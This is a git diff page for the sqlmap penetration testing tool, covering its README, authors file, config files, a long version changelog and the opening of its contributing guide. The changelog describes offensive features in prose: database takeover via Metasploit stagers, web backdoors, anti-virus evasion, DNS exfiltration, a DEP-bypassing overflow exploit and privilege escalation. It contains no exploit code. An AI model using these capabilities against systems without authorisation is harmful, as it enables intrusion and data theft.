Automatic monthly tagging

Update of parsed versions
Update for JSP exceptions
2025-12-10 07:51:35 +00:00 · 2016-06-01 10:44:08 +02:00 · 2016-06-01 10:44:08 +02:00 · 2016-05-31 15:35:10 +02:00 · 2016-05-31 14:55:56 +02:00 · 2016-05-31 14:05:35 +02:00
535 changed files with 98898 additions and 18734 deletions
--- a/.gitattributes
+++ b/.gitattributes
@@ -0,0 +1,14 @@
 *.py text eol=lf
 *.conf text eol=lf
 *_ binary
 *.dll binary
 *.pdf binary
 *.so binary
 *.wav binary
 *.zip binary
 *.x32 binary
 *.x64 binary
 *.exe binary
 *.sln binary
 *.vcproj binary
--- a/.gitignore
+++ b/.gitignore
@@ -0,0 +1,5 @@
 *.py[cod]
 output/
 .sqlmap_history
 traffic.txt
 *~
--- a/.travis.yml
+++ b/.travis.yml
@@ -0,0 +1,6 @@
 language: python
 python:
    - "2.6"
    - "2.7"
 script:
    - python -c "import sqlmap; import sqlmapapi"
--- a/README.md
+++ b/README.md
@@ -0,0 +1,65 @@
 # sqlmap
 [![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
 sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
 Screenshots
 ----
 ![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
 You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of features on the wiki.
 Installation
 ----
 You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or latest zipball by clicking  [here](https://github.com/sqlmapproject/sqlmap/zipball/master).
 Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:
    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
 sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform.
 Usage
 ----
 To get a list of basic options and switches use:
    python sqlmap.py -h
 To get a list of all options and switches use:
    python sqlmap.py -hh
 You can find a sample run [here](https://asciinema.org/a/46601).
 To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki).
 Links
 ----
 * Homepage: http://sqlmap.org
 * Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
 * Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
 * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
 * User's manual: https://github.com/sqlmapproject/sqlmap/wiki
 * Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
 * Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
 * Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
 * Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
 * Twitter: [@sqlmap](https://twitter.com/sqlmap)
 * Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
 * Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
 Translations
 ----
 * [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
 * [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
 * [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
 * [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
 * [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
 * [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
 * [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
 * [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
--- a/doc/AUTHORS
+++ b/doc/AUTHORS
@@ -1,7 +1,7 @@
-Bernardo Damele A. G. (inquis) - project leader, core developer
+Bernardo Damele Assumpcao Guimaraes (@inquisb)
-<bernardo.damele@gmail.com>
+<bernardo@sqlmap.org>
 PGP Key ID: 0x05F5A30F
-Daniele Bellucci (belch) - project founder, initial developer
+Miroslav Stampar (@stamparm)
-<daniele.bellucci@gmail.com>
+<miroslav@sqlmap.org>
-PGP Key ID: 0x9A0E8190
+
 You can contact both developers by writing to dev@sqlmap.org
--- a/doc/CHANGELOG.md
+++ b/doc/CHANGELOG.md
@@ -0,0 +1,368 @@
 # Version 1.0 (2016-02-27)
 * Implemented support for automatic decoding of page content through detected charset.
 * Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.).
 * Major improvements to program stabilization based on user reports.
 * Added new tampering scripts avoiding popular WAF/IPS/IDS mechanisms.
 * Fixed major bug with DNS leaking in Tor mode.
 * Added wordlist compilation made of the most popular cracking dictionaries.
 * Implemented multi-processor hash cracking routine(s).
 * Implemented advanced detection techniques for inband and time-based injections by usage of standard deviation method.
 * Old resume files are now deprecated and replaced by faster SQLite based session mechanism.
 * Substantial code optimization and smaller memory footprint.
 * Added option `-m` for scanning multiple targets enlisted in a given textual file.
 * Added option `--randomize` for randomly changing value of a given parameter(s) based on it's original form.
 * Added switch `--force-ssl` for forcing usage of SSL/HTTPS requests.
 * Added option `--host` for manually setting HTTP Host header value.
 * Added option `--eval` for evaluating provided Python code (with resulting parameter values) right before the request itself.
 * Added option `--skip` for skipping tests for given parameter(s).
 * Added switch `--titles` for comparing pages based only on their titles.
 * Added option `--charset` for forcing character encoding used for data retrieval.
 * Added switch `--check-tor` for checking if Tor is used properly.
 * Added option `--crawl` for multithreaded crawling of a given website starting from the target url.
 * Added option `--csv-del` for manually setting delimiting character used in CSV output.
 * Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval.
 * Added switch `--smart` for conducting through tests only in case of positive heuristic(s).
 * Added switch `--check-waf` for checking of existence of WAF/IPS/IDS protection.
 * Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables.
 * Added switch `--count` to count the number of entries for a specific table or all database(s) tables.
 * Major improvements to switches `--tables` and `--columns`.
 * Takeover switch `--os-pwn` improved: stealthier, faster and AV-proof.
 * Added switch `--mobile` to imitate a mobile device through HTTP User-Agent header.
 * Added switch `-a` to enumerate all DBMS data.
 * Added option `--alert` to run host OS command(s) when SQL injection is found.
 * Added option `--answers` to set user answers to asked questions during sqlmap run.
 * Added option `--auth-file` to set HTTP authentication PEM cert/private key file.
 * Added option `--charset` to force character encoding used during data retrieval.
 * Added switch `--check-tor` to force checking of proper usage of Tor.
 * Added option `--code` to set HTTP code to match when query is evaluated to True.
 * Added option `--cookie-del` to set character to be used while splitting cookie values.
 * Added option `--crawl` to set the crawling depth for the website starting from the target URL.
 * Added option `--crawl-exclude` for setting regular expression for excluding pages from crawling (e.g. `"logout"`).
 * Added option `--csrf-token` to set the parameter name that is holding the anti-CSRF token.
 * Added option `--csrf-url` for setting the URL address for extracting the anti-CSRF token.
 * Added option `--csv-del` for setting the delimiting character that will be used in CSV output (default `,`).
 * Added option `--dbms-cred` to set the DBMS authentication credentials (user:password).
 * Added switch `--dependencies` for turning on the checking of missing (non-core) sqlmap dependencies.
 * Added switch `--disable-coloring` to disable console output coloring.
 * Added option `--dns-domain` to set the domain name for usage in DNS exfiltration attack(s).
 * Added option `--dump-format` to set the format of dumped data (`CSV` (default), `HTML` or `SQLITE`).
 * Added option `--eval` for setting the Python code that will be evaluated before the request.
 * Added switch `--force-ssl` to force usage of SSL/HTTPS.
 * Added switch `--hex` to force usage of DBMS hex function(s) for data retrieval.
 * Added option `-H` to set extra HTTP header (e.g. `"X-Forwarded-For: 127.0.0.1"`).
 * Added switch `-hh` for showing advanced help message.
 * Added option `--host` to set the HTTP Host header value.
 * Added switch `--hostname` to turn on retrieval of DBMS server hostname.
 * Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method.
 * Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS/IDS protection.
 * Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized).
 * Added switch `--invalid-bignum` for usage of big numbers while invalidating values.
 * Added switch `--invalid-logical` for usage of logical operations while invalidating values.
 * Added switch `--invalid-string` for usage of random strings while invalidating values.
 * Added option `--load-cookies` to set the file containing cookies in Netscape/wget format.
 * Added option `-m` to set the textual file holding multiple targets for scanning purposes.
 * Added option `--method` to force usage of provided HTTP method (e.g. `PUT`).
 * Added switch `--no-cast` for turning off payload casting mechanism.
 * Added switch `--no-escape` for turning off string escaping mechanism.
 * Added option `--not-string` for setting string to be matched when query is evaluated to False.
 * Added switch `--offline` to force work in offline mode (i.e. only use session data).
 * Added option `--output-dir` to set custom output directory path.
 * Added option `--param-del` to set character used for splitting parameter values.
 * Added option `--pivot-column` to set column name that will be used while dumping tables by usage of pivot(ing).
 * Added option `--proxy-file` to set file holding proxy list.
 * Added switch `--purge-output` to turn on safe removal of all content(s) from output directory.
 * Added option `--randomize` to set parameter name(s) that will be randomly changed during sqlmap run.
 * Added option `--safe-post` to set POST data for sending to safe URL.
 * Added option `--safe-req` for loading HTTP request from a file that will be used during sending to safe URL.
 * Added option `--skip` to skip testing of given parameter(s).
 * Added switch `--skip-static` to skip testing parameters that not appear dynamic.
 * Added switch `--skip-urlencode` to skip URL encoding of payload data.
 * Added switch `--skip-waf` to skip heuristic detection of WAF/IPS/IDS protection.
 * Added switch `--smart` to conduct thorough tests only if positive heuristic(s).
 * Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi).
 * Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt.
 * Added option `--test-filter` for test filtration by payloads and/or titles (e.g. `ROW`).
 * Added option `--test-skip` for skiping tests by payloads and/or titles (e.g. `BENCHMARK`).
 * Added switch `--titles` to turn on comparison of pages based only on their titles.
 * Added option `--tor-port` to explicitly set Tor proxy port.
 * Added option `--tor-type` to set Tor proxy type (`HTTP` (default), `SOCKS4` or `SOCKS5`).
 * Added option `--union-from` to set table to be used in `FROM` part of UNION query SQL injection.
 * Added option `--where` to set `WHERE` condition to be used during the table dumping.
 * Added option `-X` to exclude DBMS database table column(s) from enumeration.
 * Added option `-x` to set URL of sitemap(.xml) for target(s) parsing.
 * Added option `-z` for usage of short mnemonics (e.g. `"flu,bat,ban,tec=EU"`).
 # Version 0.9 (2011-04-10)
 * Rewritten SQL injection detection engine.
 * Support to directly connect to the database without passing via a SQL injection, option `-d`.
 * Added full support for both time-based blind SQL injection and error-based SQL injection techniques.
 * Implemented support for SQLite 2 and 3.
 * Implemented support for Firebird.
 * Implemented support for Microsoft Access, Sybase and SAP MaxDB.
 * Extended old `--dump -C` functionality to be able to search for specific database(s), table(s) and column(s), option `--search`.
 * Added support to tamper injection data with option `--tamper`.
 * Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack.
 * Added support to enumerate roles on Oracle, `--roles` switch.
 * Added support for SOAP based web services requests.
 * Added support to fetch unicode data.
 * Added support to use persistent HTTP(s) connection for speed improvement, switch `--keep-alive`.
 * Implemented several optimization switches to speed up the exploitation of SQL injections.
 * Support to test and inject against HTTP Referer header.
 * Implemented HTTP(s) proxy authentication support, option `--proxy-cred`.
 * Implemented feature to speedup the enumeration of table names.
 * Support for customizable HTTP(s) redirections.
 * Support to replicate the back-end DBMS tables structure and entries in a local SQLite 3 database, switch `--replicate`.
 * Support to parse and test forms on target url, switch `--forms`.
 * Added switches to brute-force tables names and columns names with a dictionary attack, `--common-tables` and `--common-columns`. Useful for instance when system table `information_schema` is not available on MySQL.
 * Basic support for REST-style URL parameters by using the asterisk (`*`) to mark where to test for and exploit SQL injection.
 * Added safe URL feature, `--safe-url` and `--safe-freq`.
 * Added switch `--text-only` to strip from the HTTP response body the HTML/JS code and compare pages based only on their textual content.
 * Implemented few other features and switches.
 * Over 100 bugs fixed.
 * Major code refactoring.
 * User's manual updated.
 # Version 0.8 (2010-03-14)
 * Support to enumerate and dump all databases' tables containing user provided column(s) by specifying for instance `--dump -C user,pass`. Useful to identify for instance tables containing custom application credentials.
 * Support to parse `-C` (column name(s)) when fetching columns of a table with `--columns`: it will enumerate only columns like the provided one(s) within the specified table.
 * Support for takeover features on PostgreSQL 8.4.
 * Enhanced `--priv-esc` to rely on new Metasploit Meterpreter's 'getsystem' command to elevate privileges of the user running the back-end DBMS instance to SYSTEM on Windows.
 * Automatic support in `--os-pwn` to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP, but there is a writable folder within the web server document root.
 * Fixed web backdoor functionality for `--os-cmd`, `--os-shell` and `--os-pwn` useful when web application does not support stacked queries.
 * Added support to properly read (`--read-file`) also binary files via PostgreSQL by injecting sqlmap new `sys_fileread()` user-defined function.
 * Updated active fingerprint and comment injection fingerprint for MySQL 5.1, MySQL 5.4 and MySQL 5.5.
 * Updated active fingerprint for PostgreSQL 8.4.
 * Support for NTLM authentication via python-ntlm third party library, http://code.google.com/p/python-ntlm/, `--auth-type NTLM`.
 * Support to automatically decode `deflate`, `gzip` and `x-gzip` HTTP responses.
 * Support for Certificate authentication, `--auth-cert` option added.
 * Added support for regular expression based scope when parsing Burp or Web Scarab proxy log file (`-l`), `--scope`.
 * Added option `-r` to load a single HTTP request from a text file.
 * Added switch `--ignore-proxy` to ignore the system default HTTP proxy.
 * Added support to ignore Set-Cookie in HTTP responses, `--drop-set-cookie`.
 * Added support to specify which Google dork result page to parse, `--gpage` to be used together with `-g`.
 * Major bug fix and enhancements to the multi-threading (`--threads`) functionality.
 * Fixed URL encoding/decoding of GET/POST parameters and Cookie header.
 * Refactored `--update` to use `python-svn` third party library if available or `svn` command to update sqlmap to the latest development version from subversion repository.
 * Major bugs fixed.
 * Cleanup of UDF source code repository, https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack.
 * Major code cleanup.
 * Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus softwares that mistakenly mark sqlmap as a malware.
 * Updated user's manual.
 * Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from http://sqlmap.org/demo.html.
 # Version 0.8 release candidate (2009-09-21)
 * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (`--os-bof`) to automatically bypass DEP memory protection.
 * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable.
 * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys.
 * Added options for MySQL and PostgreSQL to inject custom user-defined functions.
 * Added support for `--first` and `--last` so the user now has even more granularity in what to enumerate in the query output.
 * Minor enhancement to save the session by default in 'output/hostname/session' file if `-s` option is not specified.
 * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system.
 * Minor bugs fixed.
 * Major code refactoring.
 # Version 0.7 (2009-07-25)
 * Adapted Metasploit wrapping functions to work with latest 3.3 development version too.
 * Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.
 * Reset takeover OOB features (if any of `--os-pwn`, `--os-smbrelay` or `--os-bof` is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too.
 * Minor improvement so that sqlmap tests also all parameters with no value (eg. par=).
 * HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and 2.6+.
 * Major bug fix to sql-query/sql-shell features.
 * Major bug fix in `--read-file` option.
 * Major silent bug fix to multi-threading functionality.
 * Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and `--os-shell` is provided.
 * Fixed MySQL 'comment injection' version fingerprint.
 * Fixed basic Microsoft SQL Server 2000 fingerprint.
 * Many minor bug fixes and code refactoring.
 # Version 0.7 release candidate (2009-04-22)
 * Added support to execute arbitrary commands on the database server underlying operating system either returning the standard output or not via UDF injection on MySQL and PostgreSQL and via xp_cmdshell() stored procedure on Microsoft SQL Server;
 * Added support for out-of-band connection between the attacker box and the database server underlying operating system via stand-alone payload stager created by Metasploit and supporting Meterpreter, shell and VNC payloads for both Windows and Linux;
 * Added support for out-of-band connection via Microsoft SQL Server 2000 and 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploitation with multi-stage Metasploit payload support;
 * Added support for out-of-band connection via SMB reflection attack with UNC path request from the database server to the attacker box by using the Metasploit smb_relay exploit;
 * Added support to read and write (upload) both text and binary files on the database server underlying file system for MySQL, PostgreSQL and Microsoft SQL Server;
 * Added database process' user privilege escalation via Windows Access Tokens kidnapping on MySQL and Microsoft SQL Server via either Meterpreter's incognito extension or Churrasco stand-alone executable;
 * Speed up the inference algorithm by providing the minimum required charset for the query output;
 * Major bug fix in the comparison algorithm to correctly handle also the case that the url is stable and the False response changes the page content very little;
 * Many minor bug fixes, minor enhancements and layout adjustments.
 # Version 0.6.4 (2009-02-03)
 * Major enhancement to make the comparison algorithm work properly also on url not stables automatically by using the difflib Sequence Matcher object;
 * Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc from user in SQL query and SQL shell if stacked queries are supported by the web application technology;
 * Major speed increase in DBMS basic fingerprint;
 * Minor enhancement to support an option (`--is-dba`) to show if the current user is a database management system administrator;
 * Minor enhancement to support an option (`--union-tech`) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing;
 * Added internal support to forge CASE statements, used only by `--is-dba` query at the moment;
 * Minor layout adjustment to the `--update` output;
 * Increased default timeout to 30 seconds;
 * Major bug fix to correctly handle custom SQL "limited" queries on Microsoft SQL Server and Oracle;
 * Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable;
 * Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server;
 * Minor bug fix to make the `--postfix` work even if `--prefix` is not provided;
 * Updated documentation.
 # Version 0.6.3 (2008-12-18)
 * Major enhancement to get list of targets to test from Burp proxy (http://portswigger.net/suite/) requests log file path or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) 'conversations/' folder path by providing option -l <filepath>;
 * Major enhancement to support Partial UNION query SQL injection technique too;
 * Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option `--stacked-test` which will be then used someday also by takeover functionality;
 * Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option `--time-test`;
 * Minor enhancement to fingerprint the web server operating system and the web application technology by parsing some HTTP response headers;
 * Minor enhancement to fingerprint the back-end DBMS operating system by parsing the DBMS banner value when -b option is provided;
 * Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option `--timeout #`, default is set to 10 seconds and must be 3 or higher;
 * Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option `--delay #`;
 * Minor enhancement to be able to get the injection payload `--prefix` and `--postfix` from user;
 * Minor enhancement to be able to enumerate table columns and dump table entries, also when the database name is not provided, by using the current database on MySQL and Microsoft SQL Server, the 'public' scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle;
 * Minor enhancemet to support also `--regexp`, `--excl-str` and `--excl-reg` options rather than only `--string` when comparing HTTP responses page content;
 * Minor enhancement to be able to specify extra HTTP headers by providing option `--headers`. By default Accept, Accept-Language and Accept-Charset headers are set;
 * Minor improvement to be able to provide CU (as current user) as user value (`-U`) when enumerating users privileges or users passwords;
 * Minor improvements to sqlmap Debian package files;
 * Minor improvement to use Python psyco (http://psyco.sourceforge.net/) library if available to speed up the sqlmap algorithmic operations;
 * Minor improvement to retry the HTTP request up to three times in case an exception is raised during the connection to the target url;
 * Major bug fix to correctly enumerate columns on Microsoft SQL Server;
 * Major bug fix so that when the user provide a SELECT statement to be processed with an asterisk as columns, now it also work if in the FROM there is no database name specified;
 * Minor bug fix to correctly dump table entries when the column is provided;
 * Minor bug fix to correctly handle session.error, session.timeout and httplib.BadStatusLine exceptions in HTTP requests;
 * Minor bug fix to correctly catch connection exceptions and notify to the user also if they occur within a thread;
 * Increased default output level from 0 to 1;
 * Updated documentation.
 # Version 0.6.2 (2008-11-02)
 * Major bug fix to correctly dump tables entries when `--stop` is not specified;
 * Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0;
 * Major bug fix when the request is POST to also send the GET parameters if any have been provided;
 * Major bug fix to correctly update sqlmap to the latest stable release with command line `--update`;
 * Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file;
 * Minor bug fix in MySQL comment injection fingerprint technique;
 * Minor improvement to correctly enumerate tables, columns and dump tables entries on Oracle and on PostgreSQL when the database name is not 'public' schema or a system database;
 * Minor improvement to be able to dump entries on MySQL < 5.0 when database name, table name and column(s) are provided;
 * Updated the database management system fingerprint checks to correctly identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;
 * More user-friendly warning messages.
 # Version 0.6.1 (2008-08-20)
 * Major bug fix to blind SQL injection bisection algorithm to handle an exception;
 * Added a Metasploit Framework 3 auxiliary module to run sqlmap;
 * Implemented possibility to test for and inject also on LIKE statements;
 * Implemented `--start` and `--stop` options to set the first and the last table entry to dump;
 * Added non-interactive/batch-mode (`--batch`) option to make it easy to wrap sqlmap in Metasploit and any other tool;
 * Minor enhancement to save also the length of query output in the session file when retrieving the query output length for ETA or for resume purposes;
 * Changed the order sqlmap dump table entries from column by column to row by row. Now it also dumps entries as they are stored in the tables, not forcing the entries' order alphabetically anymore;
 * Minor bug fix to correctly handle parameters' value with `%` character.
 # Version 0.6 (2008-09-01)
 * Complete code refactor and many bugs fixed;
 * Added multithreading support to set the maximum number of concurrent HTTP requests;
 * Implemented SQL shell (`--sql-shell`) functionality and fixed SQL query (`--sql-query`, before called `-e`) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack;
 * Added an option (`--privileges`) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator;
 * Added support (`-c`) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (`--save`) to save command line options on a configuration file;
 * Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with `--update` option;
 * Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.) installation binary packages;
 * Created sqlmap .exe (Windows) portable executable;
 * Save a lot of more information to the session file, useful when resuming injection on the same target to not loose time on identifying injection, UNION fields and back-end DBMS twice or more times;
 * Improved automatic check for parenthesis when testing and forging SQL query vector;
 * Now it checks for SQL injection on all GET/POST/Cookie parameters then it lets the user select which parameter to perform the injection on in case that more than one is injectable;
 * Implemented support for HTTPS requests over HTTP(S) proxy;
 * Added a check to handle NULL or not available queries output;
 * More entropy (randomStr() and randomInt() functions in lib/core/common.py) in inband SQL injection concatenated query and in AND condition checks;
 * Improved XML files structure;
 * Implemented the possibility to change the HTTP Referer header;
 * Added support to resume from session file also when running with inband SQL injection attack;
 * Added an option (`--os-shell`) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root;
 * Added a check to assure that the provided string to match (`--string`) is within the page content;
 * Fixed various queries in XML file;
 * Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted the library to parse it;
 * Fixed password fetching function, mainly for Microsoft SQL Server and reviewed the password hashes parsing function;
 * Major bug fixed to avoid tracebacks when the testable parameter(s) is dynamic, but not injectable;
 * Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic;
 * Enhancement to handle Set-Cookie from target url and automatically re-establish the Session when it expires;
 * Added support to inject also on Set-Cookie parameters;
 * Implemented TAB completion and command history on both `--sql-shell` and `--os-shell`;
 * Renamed some command line options;
 * Added a conversion library;
 * Added code schema and reminders for future developments;
 * Added Copyright comment and $Id$;
 * Updated the command line layout and help messages;
 * Updated some docstrings;
 * Updated documentation files.
 # Version 0.5 (2007-11-04)
 * Added support for Oracle database management system
 * Extended inband SQL injection functionality (`--union-use`) to all other possible queries since it only worked with `-e` and `--file` on all DMBS plugins;
 * Added support to extract database users password hash on Microsoft SQL Server;
 * Added a fuzzer function with the aim to parse HTML page looking for standard database error messages consequently improving database fingerprinting;
 * Added support for SQL injection on HTTP Cookie and User-Agent headers;
 * Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Splitted getValue() into getInband() and getBlind();
 * Major enhancements in common library and added checkForBrackets() method to check if the bracket(s) are needed to perform a UNION query SQL injection attack;
 * Implemented `--dump-all` functionality to dump entire DBMS data from all databases tables;
 * Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (`--exclude-sysdbs`);
 * Implemented in Dump.dbTableValues() method the CSV file dumped data automatic saving in csv/ folder by default;
 * Added DB2, Informix and Sybase DBMS error messages and minor improvements in xml/errors.xml;
 * Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/ column are specified to be dumped;
 * Important fixes in lib/option.py to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function __setCSVDir() and fixed also in lib/dump.py;
 * Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (`-g`);
 * Minor fix in lib/request.py to properly encode the url to request in case the "fixed" part of the url has blank spaces;
 * More minor layout enhancements in some libraries;
 * Renamed DMBS plugins;
 * Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;
 * Updated all documentation files.
 # Version 0.4 (2007-06-15)
 * Added DBMS fingerprint based also upon HTML error messages parsing defined in lib/parser.py which reads an XML file defining default error messages for each supported DBMS;
 * Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS;
 * Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`);
 * Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`);
 * Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation <http://sqlmap.org/dev/>;
 * Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS;
 * Improved logging functionality: passed from banal 'print' to Python native logging library;
 * Added support for more than one parameter in `-p` command line option;
 * Added support for HTTP Basic and Digest authentication methods (`--basic-auth` and `--digest-auth`);
 * Added the command line option `--remote-dbms` to manually specify the remote DBMS;
 * Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters (`--` and `#`) in UNION query statements;
 * Added the possibility to save the output into a file while performing the queries (`-o OUTPUTFILE`) so it is possible to stop and resume the same query output retrieving in a second time (`--resume`);
 * Added support to specify the database table column to enumerate (`-C COL`);
 * Added inband SQL injection (UNION query) support (`--union-use`);
 * Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;
 * Reviewed the directory tree structure;
 * Splitted lib/common.py: inband injection functionalities now are moved to lib/union.py;
 * Updated documentation files.
 # Version 0.3 (2007-01-20)
 * Added module for MS SQL Server;
 * Strongly improved MySQL dbms active fingerprint and added MySQL comment injection check;
 * Added PostgreSQL dbms active fingerprint;
 * Added support for string match (`--string`);
 * Added support for UNION check (`--union-check`);
 * Removed duplicated code, delegated most of features to the engine in common.py and option.py;
 * Added support for `--data` command line argument to pass the string for POST requests;
 * Added encodeParams() method to encode url parameters before making http request;
 * Many bug fixes;
 * Rewritten documentation files;
 * Complete code restyling.
 # Version 0.2 (2006-12-13)
 * complete refactor of entire program;
 * added TODO and THANKS files;
 * added some papers references in README file;
 * moved headers to user-agents.txt, now -f parameter specifies a file (user-agents.txt) and randomize the selection of User-Agent header;
 * strongly improved program plugins (mysqlmap.py and postgres.py), major enhancements: * improved active mysql fingerprint check_dbms(); * improved enumeration functions for both databases; * minor changes in the unescape() functions;
 * replaced old inference algorithm with a new bisection algorithm.
 * reviewed command line parameters, now with -p it's possible to specify the parameter you know it's vulnerable to sql injection, this way the script won't perform the sql injection checks itself; removed the TOKEN parameter;
 * improved Common class, adding support for http proxy and http post method in hash_page;
 * added OptionCheck class in option.py which performs all needed checks on command line parameters and values;
 * added InjectionCheck class in injection.py which performs check on url stability, dynamics of parameters and injection on dynamic url parameters;
 * improved output methods in dump.py;
 * layout enhancement on main program file (sqlmap.py), adapted to call new option/injection classes and improvements on catching of exceptions.
--- a/doc/CONTRIBUTING.md
+++ b/doc/CONTRIBUTING.md
@@ -0,0 +1,38 @@
 # Contributing to sqlmap
 ## Reporting bugs
 **Bug reports are welcome**!
 Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues).
 ### Guidelines
 * Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant.
 * Make sure you can reproduce the bug with the latest development version of sqlmap.
